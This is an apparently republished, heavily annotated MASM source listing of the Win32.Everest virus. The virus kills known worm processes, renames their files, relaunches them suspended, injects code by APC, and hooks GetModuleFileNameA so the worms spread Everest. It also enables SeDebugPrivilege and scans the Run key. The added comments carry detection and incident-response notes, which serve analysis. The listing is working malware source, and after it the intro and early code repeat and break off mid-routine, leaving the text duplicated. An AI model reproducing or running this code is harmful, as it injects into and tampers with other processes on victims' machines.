以毒传毒思想与Win32.Everest源码
Win32.Everest
by pkxp/CVC
lemme introduce my Everest virus, the world's first virus
which spreads via other viruses. The idea came to my head when
I was thinking about viruses in 2003. The virus itself is not
big, and it's not complicated; I coded it just to show something new.
Technical details:
1. find a known virus
2. kill and move it
3. run it in suspended mode and hook its GetModuleFileNameA
4. resume it
5. if there are no more known viruses, continue; else jump to 1
6. read data from HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run
7. repeat 1,2,3,4,5
8. sleep , then jump 1
So when those viruses spread, what they are spreading is my Everest instead!
pkxp / CVC
.386
.model flat,stdcall
option casemap:none
include useful.inc
.code
;-----------------------------------------------------------------------
; main - entry point. Never returns except through ExitVirus.
; 1. Single-instance check: CreateMutex('Everest'); a second copy exits.
; 2. EverestInit: own path, Windows/System dirs, SeDebugPrivilege, APIs.
; 3. Loop forever:
;      PatchFixedVirus   - walk the hard-coded FixedVirus table, each
;                          name prefixed with "<szWinPath>/"; sleep 30 min
;      PatchRegRunVirus  - read HKLM Run values into a fresh 4096-byte
;                          buffer (pMem) and walk that list; sleep 15 min
; The global pMem doubles as a mode flag for PatchAllVirus: 0 means
; "table with per-entry handler pointers", non-zero means "plain list".
; NOTE(review): path separators appear as '/' throughout this listing;
; Windows paths use '\', so this is presumably an artefact of the site
; that republished the source - confirm against the original.
; DETECTION: the mutex name 'Everest', the 30/15-minute sleep cadence
; and the plaintext Signature string at the end of the file are
; usable static / runtime indicators for this sample.
;-----------------------------------------------------------------------
main:
@pushsz 'Everest' ; macro from useful.inc (not shown); presumably pushes the address of the inline literal
push FALSE
push NULL
call CreateMutex ; CreateMutex(NULL, FALSE, "Everest")
call GetLastError
cmp eax , ERROR_ALREADY_EXISTS ; another instance already owns the mutex
jz ExitVirus
call EverestInit
PatchFixedVirus:
mov pMem , NULL ; pMem == 0 -> PatchAllVirus reads a handler pointer after each table entry
@pushsz '/'
push offset szWinPath
push offset FixedVirus
call PatchAllVirus ; PatchAllVirus(FixedVirus, szWinPath, "/")
push 1000*60*30 ; 30 minutes
call Sleep
PatchRegRunVirus:
Invoke VirtualAlloc,0,4096,MEM_RESERVE or MEM_COMMIT,PAGE_READWRITE ; buffer for the Run-key candidate list
or eax , eax
jz MainSleep ; allocation failed: skip the registry pass this round
mov pMem , eax ; pMem != 0 -> PatchAllVirus uses PatchVirus for every entry
call ReadRunKey ;read data from run to pMem
push NULL
push NULL
push pMem
call PatchAllVirus ;no prefix - the list in pMem already holds full paths
push MEM_RELEASE
push 0
push pMem
call VirtualFree
MainSleep:
push 1000*60*15 ; 15 minutes
call Sleep
jmp PatchFixedVirus ; loop forever
ExitVirus:
push 1
call ExitProcess
;--------------------------------------------------------------
;-----------------------------------------------------------------------
; EverestInit - one-time setup, called once from main.
; Fills szWormPath with this executable's own full path (the buffer is
; embedded inside the RemoteCodeStart stub, so it is carried into every
; injected process), szWinPath and szSysPath (50-byte buffers, the size
; limit passed here), then enables SeDebugPrivilege and resolves the
; kernel32 / PSAPI addresses that are patched into code immediates.
; Clobbers: eax, esi (via GetAPIz); nothing is saved.
;-----------------------------------------------------------------------
EverestInit:
push MAX_PATH
push offset szWormPath
push 0
call GetModuleFileNameA ; GetModuleFileNameA(NULL, szWormPath, MAX_PATH): our own path
push 50
push offset szWinPath
call GetWindowsDirectoryA ; e.g. the Windows directory, 50-byte limit
push 50
push offset szSysPath
call GetSystemDirectoryA ; e.g. the System32 directory, 50-byte limit
call RaisePrivileges ; enable SeDebugPrivilege on our token
call GetAPIz ; fill the 12345678h placeholders with real API addresses
ret
;---------------------------------------------------------------
;-----------------------------------------------------------------------
; PatchAllVirus(szVirusList, szPrefix, szPrefix2)   [stdcall, ret 12]
; Walks a NUL-separated list of names that ends with an empty string.
; For each entry it builds "<szPrefix><szPrefix2><name>" (wsprintf),
; strips any trailing arguments (formatVirus), looks for a running
; process with that image path (OpenNT4_2k_xp_2003Virus) and then calls
; a per-entry handler as handler(hProcess, fullPathWithArgs).
; List layout is selected by the global pMem, not by a parameter:
;   pMem == 0 -> FixedVirus layout: each name is followed by a DWORD
;                handler address, read with lodsd.
;   pMem != 0 -> ReadRunKey layout: names only; handler is PatchVirus.
; esi is the list cursor, edi the output buffer; neither is preserved
; and no registers are saved (only called from main).
; NOTE(review): in the registry pass both prefixes are NULL and are
; still handed to wsprintf as %s arguments; whether that yields an
; empty prefix or a literal "(null)" depends on the wsprintf
; implementation - confirm before assuming the second pass works.
;-----------------------------------------------------------------------
PatchAllVirus PROC szVirusList : DWORD , szPrefix : DWORD , szPrefix2 : DWORD
LOCAL hProcess : DWORD
LOCAL szVirusPath[128] : BYTE
LOCAL szformatedPath[128]: BYTE
mov esi , szVirusList ; esi = current entry
lea edi , szVirusPath ; edi = assembled full path
PAVLoop:
push esi
push szPrefix2
push szPrefix
@pushsz '%s%s%s'
push edi
call wsprintf ; wsprintf(edi, "%s%s%s", szPrefix, szPrefix2, esi)
add esp , 20 ; cdecl: caller pops the 5 arguments
mov al , byte ptr[edi]
or al , al
jz PAVExit ; empty result -> end of list
lea eax , szformatedPath
push eax
push edi
call formatVirus ; szformatedPath = path without the " args" part
lea eax , szformatedPath
push eax
call OpenNT4_2k_xp_2003Virus ; eax = handle of a running instance, or 0
mov hProcess , eax
PAVNextName:
lodsb
or al , al
jnz PAVNextName ; advance esi past the name's terminating NUL
mov eax , pMem
.if eax == 0
lodsd ; table mode: handler address stored after the name
.else
mov eax , offset PatchVirus ; list mode: fixed handler
.endif
push edi
push hProcess
call eax ; handler(hProcess, szVirusPath); both handlers end with ret 8
mov al , byte ptr[esi]
or al , al
jnz PAVLoop ; next entry; an empty string terminates the list
PAVExit:
ret 12
PatchAllVirus ENDP
;------------------------------------------------------------------
;-----------------------------------------------------------------------
; formatVirus(pVirusName, pformatedName)   [stdcall, ret 8]
; Copies pVirusName into pformatedName up to (excluding) the first
; space or NUL and NUL-terminates the copy, i.e. turns
; "<path> <args>" into "<path>". No length check is performed against
; the destination (callers pass 128-byte locals).
; Preserves all general registers (pushad/popad).
;-----------------------------------------------------------------------
formatVirus PROC pVirusName:DWORD , pformatedName:DWORD
pushad
mov esi , pVirusName
mov edi , pformatedName
FVCopy:
lodsb
cmp al , ' '
jz FVEndCopy ; first space ends the path
or al , al
jz FVEndCopy ; NUL ends the path
stosb
jmp FVCopy
FVEndCopy:
xor al , al
stosb ; terminate the copy
popad
ret 8
formatVirus ENDP
;------------------------------------------------------------------
;-----------------------------------------------------------------------
; FixedVirus - table consumed by PatchAllVirus when pMem == 0.
; Layout per entry: a NUL-terminated file name relative to szWinPath,
; then a DWORD handler address (PatchVirus for every real entry). A
; single zero byte terminates the table. The last entry,
; 'ParticularViruses', points at ParticularVirus, which is an empty
; stub (ret 8).
; The names are drop-file names used by worms of the 2001-2003 era;
; the author's trailing comments name the family where known.
; DETECTION: this exact run of strings, together with the Signature
; string at the end of the file, is a usable static signature.
;-----------------------------------------------------------------------
FixedVirus:
db 'system32/msblast.exe',0 ;msblast
dd offset PatchVirus
db 'Videodrv.exe',0 ;Mimail
dd offset PatchVirus
db 'system32/runouce.exe',0 ;ChineseHack
dd offset PatchVirus
db 'system32/gone.scr',0
dd offset PatchVirus
db 'system32/hfind.exe',0 ;muma
dd offset PatchVirus
db 'system32/scam32.exe',0 ;sircam
dd offset PatchVirus
db 'killonce.exe',0
dd offset PatchVirus
db 'system32/wins/DLLHOST.exe',0
dd offset PatchVirus
db 'system32/Ravmond.exe',0 ;Lovgate
dd offset PatchVirus
db 'system32/WinGate.exe',0
dd offset PatchVirus
db 'system32/WinDriver.exe',0
dd offset PatchVirus
db 'system32/Winrpc.exe',0
dd offset PatchVirus
db 'system32/Winhelp.exe',0
dd offset PatchVirus
db 'system32/Iexplore.exe',0
dd offset PatchVirus
db 'system32/NetServices.exe',0
dd offset PatchVirus
db 'system32/winexe.exe',0
dd offset PatchVirus
db 'mmc.exe',0 ;nimda
dd offset PatchVirus
db 'system32/load.exe',0
dd offset PatchVirus
db 'system32/wqk.exe',0 ;Klez
dd offset PatchVirus
db 'system32/krn132.exe',0
dd offset PatchVirus
db 'ParticularViruses',0 ; placeholder entry, handled by the empty ParticularVirus stub
dd offset ParticularVirus
db 0 ;End of virus list (empty string terminates the walk in PatchAllVirus)
;-------------------------------------------------------------------
;-----------------------------------------------------------------------
; OpenNT4_2k_xp_2003Virus(szVirusName)   [stdcall, ret 4]
; Returns in eax a PROCESS_ALL_ACCESS handle to the first running
; process whose main-module path equals szVirusName (case-insensitive,
; lstrcmpi), or 0 when none matches or any step fails. Our own path
; (szWormPath) is refused up front so the sample never terminates
; itself.
; Uses the PSAPI functions resolved by GetAPIz (EnumProcesses,
; EnumProcessModules, GetModuleFileNameExA) through 4-byte immediates
; that are overwritten in place; the code section therefore has to be
; writable - presumably arranged at link time, not visible here.
; Only the first module handle is requested (cb = 4), i.e. the main
; executable. Handles of non-matching processes are closed here; the
; matching handle is returned open for the caller to use and close.
; Preserves all general registers except eax (pushad/popad).
; DETECTION: EnumProcesses followed by OpenProcess(PROCESS_ALL_ACCESS)
; on every PID is a noisy sweep; process-access telemetry (e.g. Sysmon
; ProcessAccess events) shows one open per running process, repeated
; every 15-30 minutes by this sample.
;-----------------------------------------------------------------------
OpenNT4_2k_xp_2003Virus PROC szVirusName : DWORD
LOCAL hProcess : DWORD
LOCAL hMods : DWORD
LOCAL szProcessName[MAX_PATH] : BYTE
LOCAL ProcessIds[128+1] : DWORD
pushad
push szVirusName
push offset szWormPath
call lstrcmpi ; lstrcmpi(szWormPath, szVirusName) == 0 -> that is us: refuse
jz OVFailExit
lea esi , ProcessIds
push (128+1)*4
push esi
call RtlZeroMemory ; zero the PID array so the scan below stops at the first unused slot
push offset tmp
push 128*4 ;*4 - byte size of the array passed to EnumProcesses
push esi
moveax,12345678h ; printed without a space in this listing; the immediate is the patch slot below
_EnumProcesses = dword ptr $-4 ; label over the 4-byte immediate; GetAPIz stores the real address here
call eax ;enumerate all running processes - EnumProcesses(esi, 128*4, &tmp)
dec eax
jne OVFailExit ; requires a return value of exactly 1 (TRUE)
add esi,4 ;esi->ProcessIDs[128] - actually skips ProcessIds[0]; presumably because EnumProcesses reports PID 0 first and the zero test below would end the scan - confirm
ProcessSearch:
lodsd ;get PID
or eax , eax
jz OVFailExit ; zero PID = end of the filled part of the array
push eax
push FALSE
push PROCESS_ALL_ACCESS
call OpenProcess ; OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid)
or eax , eax
jz ProcessSearch ; could not open: try the next PID
mov hProcess , eax
lea eax , hMods
push offset tmp
push 4
push eax
push hProcess
mov eax , 12345678h
_EnumProcessModules = dword ptr $-4 ; patched by GetAPIz
call eax ; EnumProcessModules(hProcess, &hMods, 4, &tmp): first module only
or eax , eax
jz OVClose
lea edi , szProcessName
push MAX_PATH
push edi
push hMods
push hProcess
mov eax , 12345678h
_GetModuleFileNameEx = dword ptr $-4 ; patched by GetAPIz
call eax ; GetModuleFileNameExA(hProcess, hMods, szProcessName, MAX_PATH)
or eax , eax
jz OVClose
IsVirus:
push szVirusName
push edi
call lstrcmpi ; lstrcmpi(szProcessName, szVirusName)
jz OVSucExit ; match: return this handle still open
OVClose:
push hProcess
call CloseHandle ; not the one we want: release and continue the sweep
jmp ProcessSearch
OVFailExit:
popad
xor eax , eax ; eax = 0: not found / failure
ret 4
OVSucExit:
popad
mov eax , hProcess ; eax = open handle to the matching process
ret 4
OpenNT4_2k_xp_2003Virus ENDP
;---------------------------------------------------------------
;-----------------------------------------------------------------------
; PatchVirus(hProcess, szVirusPath)   [stdcall, ret 8]
; Default per-entry handler. szVirusPath is "<path>[ <args>]".
;  1. If hProcess != 0: TerminateProcess, wait for it to end, close it.
;  2. Rename "<path>" to "<path>.scr" with MoveFile - the original
;     binary is kept unmodified under the new name, not deleted.
;  3. Build "<path>.scr[ <args>]" and pass it to StartVirus, which
;     relaunches the renamed binary with GetModuleFileNameA hooked.
; Preserves all general registers (pushad/popad).
; IR NOTE: '<name>.scr' files sitting next to the names from
; FixedVirus or the Run key are the on-disk trace of a previous pass;
; they are the original worm binaries and can be examined as such.
;-----------------------------------------------------------------------
PatchVirus PROC hProcess : DWORD , szVirusPath : DWORD
LOCAL szDestPath[128] : BYTE
LOCAL szformatedPath[128]: BYTE
pushad
mov eax , hProcess
or eax , eax
jz PVMoveVirus ; no running instance: go straight to the rename
push 0
push hProcess
call TerminateProcess ; TerminateProcess(hProcess, 0)
push INFINITE
push hProcess
call WaitForSingleObject ; block until the process is really gone
push hProcess
call CloseHandle
PVMoveVirus:
lea esi , szformatedPath
push esi
push szVirusPath
call formatVirus ; esi = "<path>" without arguments
lea edi , szDestPath
push esi
push edi
call lstrcpy ; szDestPath = "<path>"
@pushsz '.scr'
push edi
call lstrcat ; szDestPath = "<path>.scr"
push edi
push esi
call MoveFile ; MoveFile(old = "<path>", new = "<path>.scr")
push esi
call lstrlen
mov esi , szVirusPath
add esi , eax ; esi -> text following the bare path in szVirusPath (" <args>" or "")
push esi
push edi
call lstrcat ; szDestPath = "<path>.scr<args>"
push edi
call StartVirus ; relaunch the renamed binary with the hook installed
popad
ret 8
PatchVirus ENDP
;-------------------------------------------------------------------
;-----------------------------------------------------------------------
; ParticularVirus(hProcess, szVirusPath) - placeholder handler for the
; 'ParticularViruses' table entry. Does nothing; only pops the two
; DWORD arguments so it matches the PatchVirus calling convention.
;-----------------------------------------------------------------------
ParticularVirus:
ret 8
;-------------------------------------------------------------------
;-----------------------------------------------------------------------
; StartVirus(szVirusPath)   [stdcall, ret 4]
; Launches szVirusPath as a hidden, suspended child and injects the
; RemoteCodeStart..RemoteCodeEnd stub before it is allowed to run:
;   CreateProcess(lpCommandLine = szVirusPath, bInheritHandles = TRUE,
;                 CREATE_SUSPENDED, SW_HIDE)
;   Sleep(3000)                        ; purpose not stated in the source
;   VirtualAllocEx(child, stub size, PAGE_EXECUTE_READWRITE)
;   patch _NewGetModuleFileNameA inside the local stub template with
;     the child-side address of NewGetModuleFileName (needs writable .code)
;   WriteProcessMemory(child, stub)
;   QueueUserAPC(stub, primary thread, NULL)  ; delivered once the
;                                             ; resumed thread is alertable
;   ResumeThread
; After a successful CreateProcess both handles are closed on every
; path (SVFail), whether or not the injection succeeded.
; Preserves all general registers (pushad/popad).
; Several mnemonics below are printed without the space before their
; operand ('jzSVExit', 'pushPAGE_EXECUTE_READWRITE', ...); this looks
; like a transcription artefact of the listing and is left as printed.
; DETECTION: this exact API chain against a just-created suspended
; child (RWX VirtualAllocEx -> WriteProcessMemory -> QueueUserAPC ->
; ResumeThread) is a well-known process-injection pattern that EDR
; injection detections key on.
;-----------------------------------------------------------------------
StartVirus PROC szVirusPath : DWORD
LOCAL sio : STARTUPINFO
LOCAL pi : PROCESS_INformATION
LOCAL cbWritten : DWORD
pushad
push sizeof(STARTUPINFO)
lea eax , sio
push eax
call RtlZeroMemory ; zero STARTUPINFO before filling the few fields used
mov sio.cb , sizeof STARTUPINFO
mov sio.wShowWindow , SW_HIDE
mov sio.dwFlags , STARTF_USESHOWWINDOW ; child window hidden
lea eax , pi
push eax
lea eax , sio
push eax
push NULL
push NULL
push CREATE_SUSPENDED ; child does not run until ResumeThread below
push TRUE ; bInheritHandles
push NULL
push NULL
push szVirusPath ; lpCommandLine
push NULL ; lpApplicationName
call CreateProcess
or eax , eax
jzSVExit ; launch failed: nothing to clean up
push 3000
call Sleep ; 3 s; reason not given in the source
pushPAGE_EXECUTE_READWRITE ; RWX region for the stub
pushMEM_RESERVE or MEM_COMMIT
pushRemoteCodeEnd - RemoteCodeStart ; stub size in bytes
push0
push pi.hProcess
call VirtualAllocEx
or eax , eax
jzSVFail
mov esi , eax ; esi = stub base in the child
add eax , NewGetModuleFileName - RemoteCodeStart
mov _NewGetModuleFileNameA , eax ; child-side address of the hook, written into the stub's 'push imm32'
lea eax , cbWritten
push eax
push RemoteCodeEnd - RemoteCodeStart
push offset RemoteCodeStart
push esi
push pi.hProcess
call WriteProcessMemory ; copy the (now patched) stub into the child
or eax , eax
jzSVFail
push NULL
push pi.hThread
push esi
call QueueUserAPC ; QueueUserAPC(stub, hThread, NULL): stub runs as an APC routine
or eax , eax
jzSVFail
push pi.hThread
call ResumeThread
SVFail:
push pi.hThread
call CloseHandle
push pi.hProcess
call CloseHandle
SVExit:
popad
ret 4
StartVirus ENDP
;-----------------------------------------------------------------
;-----------------------------------------------------------------------
; RemoteCodeStart..RemoteCodeEnd - self-contained stub that StartVirus
; copies into the child process, where it runs as an APC routine.
; The 12345678h immediates are filled in before the copy: the kernel32
; addresses by GetAPIz (presumably relying on kernel32 being mapped at
; the same address in every process, as on these pre-ASLR Windows
; versions - confirm), _NewGetModuleFileNameA by StartVirus.
; In the child the APC routine:
;   VirtualProtect(GetModuleFileNameA, 6, PAGE_EXECUTE_READWRITE, scratch)
;   WriteProcessMemory(-1 = own process, GetModuleFileNameA,
;                      <the 6-byte 'push imm32 / ret' image below>, 6,
;                      scratch)
;   and appears to return to the APC dispatcher through the 'ret 4' in
;   RCSJump (the 4 bytes are the NULL parameter queued by StartVirus).
; The two @pushsz '123' literals are only writable scratch for the
; lpflOldProtect / lpNumberOfBytesWritten out-parameters (the author's
; own comment says "cbWriten").
; NewGetModuleFileName is what the host then executes instead of
; GetModuleFileNameA: it ignores hModule and nSize, copies szWormPath
; (this sample's own path, embedded right here so it travels with the
; stub) into lpFilename and returns the length without the NUL
; (stdcall, ret 12). Net effect: when the hijacked worm copies
; "itself", it copies Everest.
; DETECTION: kernel32!GetModuleFileNameA whose first bytes are a
; push/ret trampoline into a private RWX region; export-prologue
; integrity checks or an RWX-region scan of the affected process flag
; it, and WriteProcessMemory with hProcess = -1 is itself unusual.
;-----------------------------------------------------------------------
RemoteCodeStart:
mov esi , 12345678h ; esi = address of GetModuleFileNameA (patched by GetAPIz)
_GetModuleFileNameA = dword ptr $-4
@pushsz '123' ;cbWriten - string literal used as the lpflOldProtect scratch
push PAGE_EXECUTE_READWRITE
push 6 ; push & ret - size of the trampoline written over the entry
push esi
mov eax , 12345678h
_VirtualProtect = dword ptr $-4 ; patched by GetAPIz
call eax ; VirtualProtect(GetModuleFileNameA, 6, RWX, scratch)
@pushsz '123' ;cbWriten - lpNumberOfBytesWritten scratch
push 6 ; nSize
call RCSJump ; pushes the address of the 6-byte image below as lpBuffer
push 12345678h ; --- 6-byte image: 'push <NewGetModuleFileName>' ...
_NewGetModuleFileNameA = dword ptr $-4 ; patched by StartVirus with the child-side address
ret ; --- ... 'ret'; never executed here, only copied
RCSJump:
push esi ; lpBaseAddress = GetModuleFileNameA
push -1 ; hProcess = current process
mov eax , 12345678h
_WriteProcessMemory = dword ptr $-4 ; patched by GetAPIz
call eax ; WriteProcessMemory(-1, esi, image, 6, scratch)
ret 4 ; appears to return from the APC itself, dropping its one parameter
NewGetModuleFileName:
push esi
push edi
mov edi , [esp+16] ; edi = lpFilename (after the two pushes and the return address / hModule)
call _szWormPath ; pushes the address of the embedded path, popped below
szWormPath db MAX_PATH dup (0) ; filled by EverestInit with our own path
_szWormPath:
pop esi ; esi = szWormPath
xor ecx , ecx
RCSLoop:
lodsb
stosb
inc ecx ; bytes copied, including the terminating NUL
or al , al
jnz RCSLoop
pop edi
pop esi
mov eax , ecx
dec eax ; return length without the NUL, as GetModuleFileNameA does
ret 12 ; stdcall, 3 DWORD arguments
RemoteCodeEnd:
;-----------------------------------------------------------------
;-----------------------------------------------------------------------
; GetAPIz - resolves six API addresses at run time and stores each one
; straight into the 'mov/push 12345678h' immediate it belongs to:
;   kernel32: GetModuleFileNameA, VirtualProtect, WriteProcessMemory
;             (used inside the injected stub, which has no import table)
;   PSAPI:    EnumProcesses, EnumProcessModules, GetModuleFileNameExA
;             (used by OpenNT4_2k_xp_2003Virus; PSAPI is loaded here)
; Writing to those labels requires the code section to be writable.
; Clobbers: eax, esi; nothing is saved. Return values of
; GetModuleHandle / LoadLibraryA / GetProcAddress are not checked.
; DETECTION: LoadLibraryA('PSAPI') followed by GetProcAddress of the
; process-enumeration trio is typical of process sweepers, and the
; plaintext API-name strings are available for static matching.
;-----------------------------------------------------------------------
GetAPIz:
@pushsz 'Kernel32.dll'
call GetModuleHandle
xchg eax,esi ; esi = kernel32 base
@pushsz 'GetModuleFileNameA'
push esi
call GetProcAddress
mov _GetModuleFileNameA,eax ; immediate inside RemoteCodeStart
@pushsz 'VirtualProtect'
push esi
call GetProcAddress
mov _VirtualProtect,eax ; immediate inside RemoteCodeStart
@pushsz 'WriteProcessMemory'
push esi
call GetProcAddress
mov _WriteProcessMemory,eax ; immediate inside RCSJump
@pushsz 'PSAPI'
call LoadLibraryA
xchg eax,esi ; esi = psapi base
@pushsz 'EnumProcesses'
push esi
call GetProcAddress
mov _EnumProcesses,eax ; immediate inside OpenNT4_2k_xp_2003Virus
@pushsz 'EnumProcessModules'
push esi
call GetProcAddress
mov _EnumProcessModules,eax ; immediate inside OpenNT4_2k_xp_2003Virus
@pushsz 'GetModuleFileNameExA'
push esi
call GetProcAddress
mov _GetModuleFileNameEx,eax ; immediate inside OpenNT4_2k_xp_2003Virus
ret
;---------------Raise Privilege of our process----------------------
;-----------------------------------------------------------------------
; RaisePrivileges - enables SeDebugPrivilege on our own token (which is
; what lets OpenProcess(PROCESS_ALL_ACCESS) succeed on processes of
; other users and of the system).
;   OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &p_token)
;   LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &p_luid)
;   AdjustTokenPrivileges(p_token, FALSE, &token_priv, NULL, NULL, NULL)
; token_priv / p_luid / the SE_PRIVILEGE_ENABLED dword after RPExit
; together form the TOKEN_PRIVILEGES structure (count 1, LUID,
; attributes). The token handle is never closed and the result of
; AdjustTokenPrivileges is not checked; the routine gives up silently
; if the token cannot be opened or the LUID lookup does not return
; exactly 1.
; Clobbers: eax (and whatever the callees clobber).
; DETECTION: a process that is not a debugger enabling SeDebugPrivilege
; is a classic privilege-abuse indicator; token-adjustment auditing
; (e.g. Windows Security event 4703) and EDR token telemetry capture it.
;-----------------------------------------------------------------------
RaisePrivileges:
call GetCurrentProcess
push offset p_token
push TOKEN_ALL_ACCESS ;DesiredAccess
push eax
call OpenProcessToken ;open token of our process
or eax,eax ;God,I used cmp eax,eax first
jz RPExit
push offset p_luid
@pushsz 'SeDebugPrivilege'
push NULL
call LookupPrivilegevalueA ;find LUID for this priv.
dec eax
jne RPExit ; requires a return value of exactly 1 (TRUE)
push 0
call SetLastError
push NULL
push NULL
push NULL
push offset token_priv ; TOKEN_PRIVILEGES built from the three data items below
push FALSE
push p_token
call AdjustTokenPrivileges ; result unchecked
RPExit:
ret
token_priv dd 1 ; TOKEN_PRIVILEGES.PrivilegeCount
p_luid db 8 dup(0) ; LUID_AND_ATTRIBUTES.Luid, filled by LookupPrivilegeValueA
dd SE_PRIVILEGE_ENABLED ; LUID_AND_ATTRIBUTES.Attributes
p_token dd 0 ; our process token handle (never closed)
;-------------------------------------------------------------------
;-----------------------------------------------------------------------
; ReadRunKey()   [no arguments]
; Enumerates the values of HKLM Software\Microsoft\Windows\
; CurrentVersion\Run and appends candidate paths to the buffer at
; pMem (edi is the write cursor), each NUL-terminated, with an extra
; NUL closing the list - the layout PatchAllVirus walks when pMem != 0.
; Per value (its data is read into szFilePath):
;   contains a '/' -> ReplaceFilePath expands a leading %system% /
;                     %windir% and the result is copied as one entry;
;   no '/'         -> two entries are emitted, "<szWinPath>/<data>"
;                     and "<szSysPath>/<data>".
; The value name and type are read but never used. The buffer is the
; 4096 bytes main allocated; nothing here checks that bound. When
; RegOpenKeyEx fails, edi has not been pointed at pMem yet, so the
; closing NUL at RRKExit is written through whatever edi held on entry.
; Preserves all general registers (pushad/popad).
; DETECTION: a query of the HKLM Run key by an unexpected process is a
; cheap registry-telemetry indicator; the key is opened for query
; only - this sample does not write autostart entries itself.
;-----------------------------------------------------------------------
ReadRunKey PROC
LOCAL hKey : DWORD
LOCAL dwIndex : DWORD
LOCAL szFilePath[MAX_PATH] : BYTE
LOCAL szvalueName[MAX_PATH] : BYTE
LOCAL dwvalueLen : DWORD
LOCAL dwDataLen : DWORD
LOCAL dwType : DWORD
pushad
lea eax , hKey
push eax
push KEY_QUERY_value ;KEY_ALL_ACCESS - read-only access is all that is needed
push 0
@pushsz 'Software/Microsoft/Windows/CurrentVersion/Run'
push HKEY_LOCAL_MACHINE
call RegOpenKeyEx
cmp eax , ERROR_SUCCESS
jnz RRKExit
push 0
pop dwIndex ; dwIndex = 0 (push/pop used as a short move)
push pMem
pop edi ; edi = output cursor into the list buffer
RRKLoop:
push MAX_PATH
pop dwDataLen ; reset the in/out sizes for every RegEnumValue call
push MAX_PATH
pop dwvalueLen
lea eax , dwDataLen
push eax
lea esi , szFilePath
push esi ; esi = value data (the file path)
lea eax , dwType
push eax
push NULL
lea eax , dwvalueLen
push eax
lea eax , szvalueName
push eax
push dwIndex
push hKey
call RegEnumvalue ; RegEnumValue(hKey, dwIndex, name, &nameLen, NULL, &type, data, &dataLen)
cmp eax , ERROR_SUCCESS
jnz RRKClose ; no more values (or error): finish
push edi
mov edi , esi
push edi
call lstrlen
mov ecx , eax
mov al , '/'
repnz scasb ; scan the data for a path separator; ZF set when one is found
pop edi
jz RRRKReplace ; has a directory part: expand %system% / %windir% and copy once
push esi
@pushsz '/'
push offset szWinPath
@pushsz '%s%s%s'
push edi
call wsprintf ; entry 1: "<szWinPath>/<data>"
add esp , 20 ; cdecl cleanup
push edi
call lstrlen
add edi , eax
xor al , al
stosb ; terminate entry 1 and move the cursor past it
push esi
@pushsz '/'
push offset szSysPath
@pushsz '%s%s%s'
push edi
call wsprintf ; entry 2: "<szSysPath>/<data>"
add esp , 20
jmp RRKNext
RRRKReplace:
push esi
call ReplaceFilePath ; in-place %system% / %windir% expansion of szFilePath
push esi
push edi
call lstrcpy ; single entry: the (expanded) data
RRKNext:
push edi
call lstrlen
add edi , eax
xor al , al
stosb ; terminate the entry and move the cursor past it
inc dwIndex
jmp RRKLoop
RRKClose:
push hKey
call RegCloseKey
RRKExit:
xor al , al
stosb ; second NUL: end of list
popad
ret
ReadRunKey ENDP
;------------------------------------------------------------------
;-----------------------------------------------------------------------
; ReplaceFilePath(szFilePath)   [stdcall, ret 4]
; In-place expansion of a leading "%system%" or "%windir%" in
; szFilePath (exactly 8 bytes, case-sensitive byte compare via
; repz cmpsb): the prefix is replaced by szSysPath / szWinPath and the
; remainder - edi, left by cmpsb just past the 8 bytes - is appended.
; Strings with neither prefix are left unchanged. Works from a
; MAX_PATH local copy (s); the result is written back into the
; caller's buffer with lstrcpy/lstrcat without a length check.
; Preserves all general registers (pushad/popad).
;-----------------------------------------------------------------------
ReplaceFilePath PROC szFilePath : DWORD
LOCAL s[MAX_PATH] : BYTE
pushad
push szFilePath
lea edi , s
push edi
call lstrcpy ; s = copy of the input; edi still points at s afterwards
IsSysDir:
push 8
pop ecx ; ecx = 8 = strlen("%system%")
@pushsz '%system%' ;len=8
pop esi
repz cmpsb ; compare the first 8 bytes of s with "%system%"
jne IsWinDir
push offset szSysPath
push szFilePath
call lstrcpy ; szFilePath = szSysPath
jmp RFPCat
IsWinDir:
push 8
pop ecx
@pushsz '%windir%' ;len=8
pop esi
lea edi , s ; restart the compare from the beginning of the copy
repz cmpsb
jne RFPExit ; no known prefix: leave szFilePath untouched
push offset szWinPath
push szFilePath
call lstrcpy ; szFilePath = szWinPath
RFPCat:
push edi
push szFilePath
call lstrcat ; append the text that followed the 8-byte prefix
RFPExit:
popad
ret 4
ReplaceFilePath ENDP
;-----------------------------------------------------------------------
; Global data. Declared under .code (there is no .data section in this
; listing), which also explains why labels inside code are written to.
;-----------------------------------------------------------------------
Signature db 'Win32.Everest by PKXP/CVC, made in China.',0 ; plaintext marker; usable as a static signature
szWinPath db 50 dup (0) ; Windows directory, filled by EverestInit (50-byte limit)
szSysPath db 50 dup (0) ; System directory, filled by EverestInit (50-byte limit)
tmp dd ? ; lpcbNeeded scratch for the PSAPI calls in OpenNT4_2k_xp_2003Virus
pMem dd 0 ; 0 = fixed-table pass; otherwise the Run-key candidate list (see main / PatchAllVirus)
VEnd:
end main
by pkxp/CVC
lemme introduce my Everest virus, the world's first virus
which spreads via other viruses. The idea came to my head when
I was thinking about viruses in 2003. The virus itself is not
big, and it's not complicated; I coded it just to show something new.
Technical details:
1. find a known virus
2. kill and move it
3. run it in suspended mode and hook its GetModuleFileNameA
4. resume it
5. if there are no more known viruses, continue; else jump to 1
6. read data from HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run
7. repeat 1,2,3,4,5
8. sleep , then jump 1
So when those viruses spread, what they are spreading is my Everest instead!
pkxp / CVC
.386
.model flat,stdcall
option casemap:none
include useful.inc
.code
main:
@pushsz 'Everest'
push FALSE
push NULL
call CreateMutex
call GetLastError
cmp eax , ERROR_ALREADY_EXISTS
jz ExitVirus
call EverestInit
PatchFixedVirus:
mov pMem , NULL
@pushsz '/'
push offset szWinPath
push offset FixedVirus
call PatchAllVirus
push 1000*60*30
call Sleep
PatchRegRunVirus:
Invoke VirtualAlloc,0,4096,MEM_RESERVE or MEM_COMMIT,PAGE_READWRITE
or eax , eax
jz MainSleep
mov pMem , eax
call ReadRunKey ;read data from run to pMem
push NULL
push NULL
push pMem
call PatchAllVirus ;no prefix
push MEM_RELEASE
push 0
push pMem
call VirtualFree
MainSleep:
push 1000*60*15
call Sleep
jmp PatchFixedVirus
ExitVirus:
push 1
call ExitProcess
;--------------------------------------------------------------
EverestInit:
push MAX_PATH
push offset szWormPath
push 0
call GetModuleFileNameA
push 50
push offset szWinPath
